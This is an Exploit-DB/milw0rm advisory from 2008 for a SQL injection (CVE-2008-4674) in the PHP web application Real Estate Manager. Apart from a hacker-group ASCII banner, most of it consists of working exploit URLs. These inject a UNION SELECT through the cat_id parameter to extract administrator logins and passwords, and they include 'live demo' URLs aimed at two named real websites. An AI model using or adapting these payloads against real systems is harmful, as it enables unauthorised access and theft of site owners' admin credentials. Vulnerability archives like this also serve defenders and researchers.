Real Estate Manager cat_id Remote SQL Injection Vulnerability

2008-09-27T00:00:00
ID EDB-ID:6599
Type exploitdb
Reporter CraCkEr
Modified 2008-09-27T00:00:00

Description

Real Estate Manager (cat_id) Remote SQL injection vulnerability. CVE-2008-4674. Webapps exploit for php platform

                                        
                                            ?????????????????????????????????????????????????????????????????????????????????????
??                                C r a C k E r                                   ??
??             T H E   C R A C K   O F   E T E R N A L   M I G H T                ??
????????????????????????????????????????????????????????????????????????????????????

 ?????         From The Ashes and Dust Rises An Unimaginable crack....         ?????
????????????????????????????????????????????????????????????????????????????????????
??                             [ Remote SQL Injection ]                           ??
????????????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                   : :                                       :
?   Group    : N/A                       ? ?                                       ?
?   Script   : Real Estate Manager       ? ?         Register Globals :            ?
?   Download : N/A                       ? ?                                       ?
?   Method   : GET                       ? ?          [?] ON   [ ] OFF             ?
?   Critical : High [????????]           ? ?                                       ?
?   Impact   : System access             ? ?                                       ?
? ???????????????????????????????????????? ??????????????????????????????????????? ?
?                                 DALnet #crackers                                ??
????????????????????????????????????????????????????????????????????????????????????
:                                                                                  :
?  Release Notes:                                                                  ?
?  ?????????????                                                                   ?
?  Typically used for remotely exploitable vulnerabilities that can lead to        ?
?  system compromise.                                                              ?
?                                                                                  ?

????????????????????????????????????????????????????????????????????????????????????
??                                Exploit URL's                                   ??
????????????????????????????????????????????????????????????????????????????????????

[SQL]
  
http://localhost/path/?lang=en&tpl=default&mode=browse&cat_id=-1 UNION SELECT concat(login,0x3a,password) FROM realestate_admin--

Live Demo:

http://realeastatephp.net/demo/?lang=en&tpl=default&mode=browse&cat_id=-1 UNION SELECT concat(login,0x3a,password) FROM realestate_admin--

http://draz-nekretnine.com/realestate/realestate-index.php?lang=en&tpl=default&mode=browse&cat_id=-1 UNION SELECT concat(login,0x3a,password) FROM realestate_admin--

   
????????????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

????????????????????????????????????????????????????????????????????????????????????
??                                 © CraCkEr 2008                                 ??
????????????????????????????????????????????????????????????????????????????????????


# milw0rm.com [2008-09-27]